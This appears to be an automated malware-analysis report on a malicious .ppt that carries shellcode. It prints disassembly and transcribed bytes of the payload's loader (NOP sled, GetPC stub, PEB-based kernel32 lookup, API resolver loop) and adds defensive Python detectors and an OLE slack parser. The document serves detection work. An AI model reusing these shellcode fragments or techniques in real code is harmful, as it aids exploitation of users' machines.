Verdict: MALICIOUS
Risk score: 480
Malware Insights
MITRE ATT&CK: T1203 Exploitation for Client Execution; T1055 Process Injection
The file is a binary-format (.ppt) PowerPoint document that carries a native-code payload rather than macros. Static analysis found a 32-byte NOP sled, a CALL $+5 / POP EBX GetPC stub, PEB access through fs:[0x30], and a loop that runs a hash-based resolver (classified by the analyzer as ROR13-style) over seven API slots. The listed offsets (0x30E2C onward) fall inside the span of the OLE document carved from offset 0xF000 of the submitted file (0xF000 .. 0xF000 + 158,720 = 0x35C00), most of which is unallocated sector slack. The CVE match (CVE-2011-1269 / MS11-036) is a family-level attribution based on the payload's shape: the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556, and none of the heuristics below confirms a specific parser bug. The analyzer also tagged a process-injection shellcode pattern (T1055); the listings reproduced in this report cover only the loader prologue (GetPC, kernel32 lookup, API resolution, and a loop that calls a resolved API with a counter and checks the result against a 0x35000..0x36000 window), so the injection stage itself is not visible here. ClamAV reported nothing on the carved artifact.
Heuristics (11)
- PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family · critical · PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
  A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
- XOR-encoded strings (key 0x92) · critical · SC_XOR_ENCODED
  Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x92: 'advapi32.dll', 'shell32.dll'. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (a single mnemonic, 'xchg', makes up 55% of the decoded instructions, which points to a sled or padding/filler run, not program logic).
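How a single-byte key such as 0x92 is recovered, as an added example that is not the analyzer's own code: every one of the 255 non-zero keys is tried and the keys under which more than one known Windows library or API name appears are reported. The KNOWN_NAMES list, the function names and the sample buffer are constructed for this example; the two DLL names in the buffer are the ones the finding reports.

```python
"""Single-byte XOR key recovery for encoded Windows library/API names.
Added example, not the analyzer's code: every 1-byte key is tried and the
keys under which known names appear are reported, which is the kind of
check behind an SC_XOR_ENCODED finding. KNOWN_NAMES and the sample buffer
are constructed for the example."""
import re

KNOWN_NAMES = (
    b"kernel32.dll", b"advapi32.dll", b"shell32.dll", b"ntdll.dll",
    b"LoadLibraryA", b"GetProcAddress", b"WinExec", b"CreateFileA",
)


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with one key byte (the same op encodes and decodes)."""
    return bytes(b ^ key for b in data)


def find_xor_encoded_names(data: bytes, min_hits: int = 2) -> dict:
    """{key: [(offset, name), ...]} for each key exposing >= min_hits known
    names. Key 0 is skipped: plain-text names are a weaker, separate signal.
    Requiring two hits under one key keeps single accidental matches out."""
    hits = {}
    for key in range(1, 256):
        plain = xor_bytes(data, key)
        found = [(m.start(), name.decode())
                 for name in KNOWN_NAMES
                 for m in re.finditer(re.escape(name), plain)]
        if len(found) >= min_hits:
            hits[key] = sorted(found)
    return hits


def build_sample(key: int = 0x92) -> bytes:
    """Constructed buffer (not bytes from the analysed file): filler, the two
    DLL names the report found encoded under 0x92, and a 0x90 run."""
    return (b"\xff" * 16 + xor_bytes(b"advapi32.dll", key) + b"\x00" * 8
            + xor_bytes(b"shell32.dll", key) + b"\x90" * 24)


if __name__ == "__main__":
    for key, names in find_xor_encoded_names(build_sample()).items():
        print(f"key {key:#04x}: {names}")
```

Two names under the same key in a small region is a strong signal; a single hit is not, because a short name can appear by chance under some key in high-entropy data, which is why min_hits defaults to 2.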
- Embedded Office document has suspicious static findings · critical · EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
  A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- NOP sled detected · high · SC_NOP_SLED
  Found 20+ consecutive 0x90 bytes. The listing shows 32 of them (00030E2C..00030E4B) immediately before the sub esp, 0x800 / pushal prologue at 00030E4C, so the sled leads straight into the GetPC stub rather than being isolated padding.
  Disassembly
  x86 disassembly · validity: uncertain (0.662) — 9/11 branch targets land on an instruction boundary (82% coherence)

    00030E2C..00030E4B  90            nop                                  (32 consecutive nops: the sled)
    00030E4C            81ec00080000  sub esp, 0x800
    00030E52            60            pushal
    00030E53            e800000000    call 0x30e58
    00030E58            5b            pop ebx
    00030E59            81ebac104000  sub ebx, 0x4010ac
    00030E5F            eb30          jmp 0x30e91
    00030E61            16            push ss
    00030E62            65fa          cli
    00030E64            10ec          adc ah, ch
    00030E66            97            xchg edi, eax
    00030E67            030cf6        add ecx, dword ptr [esi + esi*8]
    00030E6A            22b97cac08da  and bh, byte ptr [ecx - 0x25f75384]
    00030E70            76ad          jbe 0x30e1f
    00030E72            9b            wait
    00030E73            7ddf          jge 0x30e54
    00030E75            fb            sti
    00030E76            97            xchg edi, eax
    00030E77            fd            std
    00030E78            0f7ed8        movd eax, mm3
    00030E7B            e273          loop 0x30ef0
    00030E7D..00030E8B  ff            .byte 0xff                           (15 bytes of 0xff)

  The 'uncertain' score comes from the region after the jmp at 00030E5F. The stub jumps to 0x30e91, and everything from 00030E61 to 00030E90 is the data block it skips (ebx + 0x4010b5 resolves to 00030E61 once the sub at 00030E59 has run, and the later code fills seven 4-byte slots from there, followed by 0xff-filled storage), so the push ss / cli / movd sequence is data decoded as code, not program logic.
- x86 GetPC stub (CALL $+5; POP EBX) · high · SC_GETPC_CALL
  call 0x30e58 pushes the address of the following pop ebx, so ebx receives the stub's own location; sub ebx, 0x4010ac then rebases it so that every later [ebx + 0x4010xx] operand addresses the data block that begins at 00030E61 (0x4010b5 - 0x4010ac = 9 bytes past the pop), whatever address the payload was loaded at.
  Disassembly
  x86 disassembly · validity: uncertain (0.619) — 9/12 branch targets land on an instruction boundary (75% coherence)

    00030E53            e800000000    call 0x30e58
    00030E58            5b            pop ebx
    00030E59            81ebac104000  sub ebx, 0x4010ac
    00030E5F            eb30          jmp 0x30e91
    00030E61            16            push ss
    00030E62            65fa          cli
    00030E64            10ec          adc ah, ch
    00030E66            97            xchg edi, eax
    00030E67            030cf6        add ecx, dword ptr [esi + esi*8]
    00030E6A            22b97cac08da  and bh, byte ptr [ecx - 0x25f75384]
    00030E70            76ad          jbe 0x30e1f
    00030E72            9b            wait
    00030E73            7ddf          jge 0x30e54
    00030E75            fb            sti
    00030E76            97            xchg edi, eax
    00030E77            fd            std
    00030E78            0f7ed8        movd eax, mm3
    00030E7B            e273          loop 0x30ef0
    00030E7D..00030E8B  ff            .byte 0xff                           (15 bytes of 0xff)
    00030E8C            ffa6f3217064  jmp dword ptr [esi + 0x647021f3]
    00030E92            a130000000    mov eax, dword ptr [0x30]
    00030E97            8b400c        mov eax, dword ptr [eax + 0xc]
    00030E9A            8b701c        mov esi, dword ptr [eax + 0x1c]
    00030E9D            ad            lodsd eax, dword ptr [esi]
    00030E9E            8b4008        mov eax, dword ptr [eax + 8]
    00030EA1            8983d1104000  mov dword ptr [ebx + 0x4010d1], eax
    00030EA7            fc            cld
    00030EA8            8dbbb5104000  lea edi, [ebx + 0x4010b5]
    00030EAE            33c9          xor ecx, ecx
    00030EB0            b107          mov cl, 7
    00030EB2            e8            .byte 0xe8

  This linear sweep is misaligned from 00030E61 (the data block) through 00030E92: the 6-byte decode at 00030E8C swallows the 0x64 FS-segment prefix that belongs to the instruction at 00030E91, which is why 'mov eax, dword ptr [0x30]' appears here instead of 'mov eax, dword ptr fs:[0x30]'. The correctly aligned decode of the same bytes is the listing under SC_PEB_ACCESS.
- PEB access via FS segment (x86) · high · SC_PEB_ACCESS
  The stub reads fs:[0x30] (the PEB), takes PEB.Ldr at +0x0C and InInitializationOrderModuleList at +0x1C, advances to the second list entry with lodsd and reads its DllBase at +0x08. That is the classic kernel32.dll lookup for Windows XP/2003; on Windows 7 and later the second module in initialization order is KernelBase.dll, so this prologue is tied to the OS generation that CVE-2011-1269 targeted and would resolve the wrong module on a current system.
  Disassembly
  x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)

    00030E91  64a130000000  mov eax, dword ptr fs:[0x30]
    00030E97  8b400c        mov eax, dword ptr [eax + 0xc]
    00030E9A  8b701c        mov esi, dword ptr [eax + 0x1c]
    00030E9D  ad            lodsd eax, dword ptr [esi]
    00030E9E  8b4008        mov eax, dword ptr [eax + 8]
    00030EA1  8983d1104000  mov dword ptr [ebx + 0x4010d1], eax
    00030EA7  fc            cld
    00030EA8  8dbbb5104000  lea edi, [ebx + 0x4010b5]
    00030EAE  33c9          xor ecx, ecx
    00030EB0  b107          mov cl, 7
    00030EB2  e8f0000000    call 0x30fa7
    00030EB7  83c704        add edi, 4
    00030EBA  e2f6          loop 0x30eb2
    00030EBC  fc            cld
    00030EBD  33c0          xor eax, eax
    00030EBF  b4c3          mov ah, 0xc3
    00030EC1  8bb3b5104000  mov esi, dword ptr [ebx + 0x4010b5]
    00030EC7  ac            lodsb al, byte ptr [esi]
    00030EC8  38c4          cmp ah, al
    00030ECA  7402          je 0x30ece
    00030ECC  ebf9          jmp 0x30ec7
    00030ECE  4e            dec esi
    00030ECF  89b3e1104000  mov dword ptr [ebx + 0x4010e1], esi
    00030ED5  33f6          xor esi, esi
    00030ED7  eb1a          jmp 0x30ef3
    00030ED9  6a00          push 0
    00030EDB  56            push esi
    00030EDC  ff93c5104000  call dword ptr [ebx + 0x4010c5]
    00030EE2  3d00500300    cmp eax, 0x35000
    00030EE7  7609          jbe 0x30ef2
    00030EE9  3d00600300    cmp eax, 0x36000
    00030EEE  7302          jae 0x30ef2
    00030EF0  eb            .byte 0xeb

  Reading the listing with ebx = 00030E58 - 0x4010ac (from the GetPC stub): the module base found through the PEB is stored at ebx + 0x4010d1 (00030E7D). The loop at 00030EA8..00030EBA runs the routine at 0x30fa7 (not shown on this page) over seven consecutive 4-byte slots starting at ebx + 0x4010b5 (00030E61), replacing each stored value with a resolved function pointer in place. The scan at 00030EC1..00030ECF then walks forward from the first resolved function until it finds a 0xC3 (ret) byte and records that address at ebx + 0x4010e1 (00030E8D); its use is not visible in this listing. The loop entered at 00030ED5 calls the fifth slot (ebx + 0x4010c5, 00030E71) with arguments (esi, 0), esi starting at zero, and only accepts a return value between 0x35000 and 0x36000. That calling pattern is consistent with probing handle values for the open document by file size; the carved OLE starts at offset 0xF000 and is 158,720 bytes, so the submitted file is at least 0xF000 + 158,720 = 0x35C00 bytes, inside that window. Which API occupies the fifth slot is an inference from the pattern, not something this report establishes.
- PEB API-hash resolver · high · SC_API_HASH_RESOLVER
  PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver. The hashing routine itself (at 0x30fa7) is not in any listing on this page; what the listings show is the calling loop (lea edi, [ebx + 0x4010b5]; mov cl, 7; call; add edi, 4; loop) and the seven pre-resolution slot values at 00030E61..00030E7C, which the loop overwrites with function pointers.
  Disassembly: identical to the listing under SC_PEB_ACCESS above (00030E91..00030EF0, validity: code, 0.944).
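The sled, GetPC and PEB findings above, and the EBX-relative data references in the listings, as an added example that is not the analyzer's code: the scanner below matches the three byte patterns, derives the value EBX holds after the GetPC stub, and uses it to turn the [ebx + 0x4010xx] operands into offsets. The sample bytes are transcribed from the listings on this page (0x30E2C..0x30EB6); file offsets stand in for virtual addresses, which is valid because only the distance between the stub's POP and each displacement matters. The regexes and the function names (scan_indicators, getpc_base, rebase, read_slots) are my own.

```python
"""Static triage of a position-independent x86 payload. Added example,
not the analyzer's code. SAMPLE is transcribed from the listings on this
page (file offsets 0x30E2C..0x30EB6); everything else is constructed."""
import re
import struct

SAMPLE_BASE = 0x30E2C
SAMPLE = bytes.fromhex(
    "90" * 32                                       # 0x30E2C: NOP sled
    + "81ec00080000" "60"                           # sub esp,0x800 ; pushal
    + "e800000000" "5b"                             # call $+5 ; pop ebx
    + "81ebac104000"                                # sub ebx,0x4010ac
    + "eb30"                                        # jmp 0x30e91 (skip data)
    + "1665fa10" "ec97030c" "f622b97c" "ac08da76"   # 0x30E61: seven 4-byte slots
    + "ad9b7ddf" "fb97fd0f" "7ed8e273"
    + "ff" * 16 + "a6f32170"                        # 0x30E7D: storage slots
    + "64a130000000"                                # 0x30E91: mov eax,fs:[0x30]
    + "8b400c" "8b701c" "ad" "8b4008"               # Ldr -> InInitOrder -> DllBase
    + "8983d1104000" "fc"                           # store base ; cld
    + "8dbbb5104000" "33c9" "b107"                  # edi = slot table ; ecx = 7
    + "e8f0000000"                                  # call resolver
)

# Byte patterns behind the SC_NOP_SLED / SC_GETPC_CALL / SC_PEB_ACCESS findings.
NOP_SLED = re.compile(rb"\x90{20,}")
# call rel32=0 ; pop r32 ; optional sub r32, imm32 (opcode 81 /5)
GETPC = re.compile(rb"\xe8\x00\x00\x00\x00([\x58-\x5f])(?:\x81([\xe8-\xef])(.{4}))?", re.S)
# mov eax, fs:[0x30]  or  mov r32, fs:[0x30] with a disp32 ModRM
PEB_FS30 = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")


def scan_indicators(buf: bytes, base: int) -> dict:
    """File offsets of each indicator; sleds also carry their length."""
    return {
        "nop_sled": [(base + m.start(), m.end() - m.start())
                     for m in NOP_SLED.finditer(buf)],
        "getpc": [base + m.start() for m in GETPC.finditer(buf)],
        "peb_fs30": [base + m.start() for m in PEB_FS30.finditer(buf)],
    }


def getpc_base(buf: bytes, base: int):
    """(register, value) the GetPC register holds after the stub: POP yields
    the address of the POP itself, and a following SUB reg, imm32 rebases it.
    The value is kept as a plain integer; only its delta to the stub matters."""
    m = GETPC.search(buf)
    if m is None:
        return None
    reg = m.group(1)[0] - 0x58
    value = base + m.start() + 5
    if m.group(2) is not None and (m.group(2)[0] & 7) == reg:
        value -= struct.unpack("<I", m.group(3))[0]
    return reg, value


def rebase(reg_value: int, disp: int) -> int:
    """Address named by a [reg + disp32] operand, with 32-bit wraparound."""
    return (reg_value + disp) & 0xFFFFFFFF


def read_slots(buf: bytes, base: int, addr: int, count: int) -> list:
    """Little-endian dwords at file offset addr (the pre-resolution slot values)."""
    off = addr - base
    return list(struct.unpack("<%dI" % count, buf[off:off + 4 * count]))


if __name__ == "__main__":
    print(scan_indicators(SAMPLE, SAMPLE_BASE))
    reg, ebx = getpc_base(SAMPLE, SAMPLE_BASE)
    # Displacements exactly as they appear in the listing.
    for label, disp in (("slot table", 0x4010B5), ("fifth slot", 0x4010C5),
                        ("module base", 0x4010D1), ("ret pointer", 0x4010E1)):
        print(f"{label:12s} [ebx+{disp:#x}] -> {rebase(ebx, disp):#x}")
    print([f"{v:#010x}" for v in read_slots(SAMPLE, SAMPLE_BASE, rebase(ebx, 0x4010B5), 7)])
```

The GETPC pattern only handles the CALL $+5 / POP / SUB reg, imm32 form seen here; stubs that use FSTENV or a different rebasing arithmetic need their own pattern. The slot values read out are the inputs to the resolver at 0x30fa7, which this page does not show, so the example deliberately stops at locating them rather than guessing which API each one names.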
- OLE file contains raw shellcode-like resolver payload · high · OLE_RAW_SHELLCODE_PAYLOAD
  Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
- OLE document has large unaccounted-for region · high · OLE_SLACK_ANOMALY
  This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The OLE file is 158,720 bytes but its declared streams total only 49,564 bytes; the remaining 109,156 bytes (69%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- OLE file has appended executable-looking payload bytes · high · OLE_APPENDED_PAYLOAD
  This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The OLE compound file contains a large high-entropy region beyond the declared major streams, and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
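The slack and appended-payload findings both rest on one measurement: the bytes that the directory's stream entries account for versus the length of the file. An added example of computing it (not the analyzer's parser), with a constructed minimal compound file to run it on; structure offsets follow the [MS-CFB] version 3 layout with 512-byte sectors, and the function names are my own. The header, FAT and directory sectors are legitimately outside any stream, so even a clean file shows a few KiB of unaccounted bytes; the 69% measured on this sample is far beyond that.

```python
"""CFB/OLE stream accounting: bytes claimed by stream directory entries vs
file length. Added example, not the analyzer's parser; layout per [MS-CFB]
v3 (512-byte sectors). build_minimal_cfb() constructs the test file."""
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF


def _sector(data, sec, ssz):
    """Bytes of sector sec (sector 0 starts right after the header), or None."""
    off = (sec + 1) * ssz
    return data[off:off + ssz] if off + ssz <= len(data) else None


def _chain(fat, start):
    """Follow a FAT chain; stop on end-of-chain, a bad index, or a loop."""
    seen, sec = set(), start
    while sec < len(fat) and sec not in seen:
        seen.add(sec)
        yield sec
        sec = fat[sec]


def ole_stream_accounting(data: bytes) -> dict:
    """Sum every stream entry's size and compare with the file size. Entries
    are read linearly, so a damaged red-black tree cannot hide a stream."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not a CFB/OLE compound file")
    ssz = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    per = ssz // 4                                  # dwords per sector
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    first_difat, n_difat = struct.unpack_from("<II", data, 0x44)
    difat = list(struct.unpack_from("<109I", data, 0x4C))
    sec = first_difat
    for _ in range(min(n_difat, 1024)):             # DIFAT overflow sectors
        blk = _sector(data, sec, ssz)
        if blk is None:
            break
        ents = struct.unpack("<%dI" % per, blk)
        difat.extend(ents[:-1])
        sec = ents[-1]
    fat = []
    for sec in difat[:n_fat]:
        blk = _sector(data, sec, ssz)
        if blk is None:
            break
        fat.extend(struct.unpack("<%dI" % per, blk))
    streams = []
    for dsec in _chain(fat, first_dir):
        blk = _sector(data, dsec, ssz)
        if blk is None:
            break
        for i in range(0, ssz, 128):
            ent = blk[i:i + 128]
            nlen, etype = struct.unpack_from("<HB", ent, 0x40)
            if etype == 2:                          # 2 = stream object
                name = ent[:max(nlen - 2, 0)].decode("utf-16-le", "replace")
                streams.append((name, struct.unpack_from("<I", ent, 0x78)[0]))
    declared = sum(size for _, size in streams)
    return {"file_size": len(data), "streams": streams, "declared": declared,
            "slack": len(data) - declared,
            "slack_ratio": (len(data) - declared) / len(data)}


def build_minimal_cfb(payload: bytes, slack: bytes = b"") -> bytes:
    """Constructed v3 file: header, one FAT sector, one directory sector (root
    plus one stream), the stream's sectors, then appended bytes no directory
    entry accounts for. Use payload >= 4096 bytes so it belongs in regular
    sectors rather than the mini stream, which is not modelled here."""
    ssz = 512
    n_data = -(-len(payload) // ssz)                # ceil division
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 2 + n_data)) + [ENDOFCHAIN]
    fat += [FREESECT] * (ssz // 4 - len(fat))
    hdr = bytearray(ssz)
    hdr[:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)
    struct.pack_into("<9I", hdr, 0x28, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))

    def entry(name, etype, start, size, child=FREESECT):
        e = bytearray(128)
        n = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(n)] = n
        struct.pack_into("<HBB", e, 0x40, len(n), etype, 1)
        struct.pack_into("<III", e, 0x44, FREESECT, FREESECT, child)
        struct.pack_into("<II", e, 0x74, start, size)
        return e

    directory = entry("Root Entry", 5, ENDOFCHAIN, 0, child=1) + entry("payload", 2, 2, len(payload))
    directory += bytes(ssz - len(directory))
    body = payload + bytes(n_data * ssz - len(payload))
    return bytes(hdr) + struct.pack("<%dI" % (ssz // 4), *fat) + bytes(directory) + body + slack


if __name__ == "__main__":
    doc = build_minimal_cfb(b"A" * 5000, slack=b"\xfe" * 10000)
    r = ole_stream_accounting(doc)
    print(r["streams"], r["declared"], r["file_size"], f"{r['slack_ratio']:.0%}")
```

The parser tolerates the malformed input the OLE_RAW_SHELLCODE_PAYLOAD finding describes: sector numbers pointing past the end of the file stop the walk instead of raising, and a FAT chain that loops back on itself terminates through the seen set. What it does not do is decide where the unaccounted bytes are; pairing the ratio with the shellcode indicators is what turns a slack anomaly into a payload-carrier verdict.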
- Suspicious extracted artifact · medium · EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_off0000f000.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0xF000 | 158720 bytes |

SHA-256: ce63127fd658685d5fad80bb8df90292e46b9d3eaa2be9b01d5bc68d17d8b42c

Detection
ClamAV: No threats found
Obfuscation or payload: likely (static shellcode analysis found candidate code region(s); indicators: NOP sled)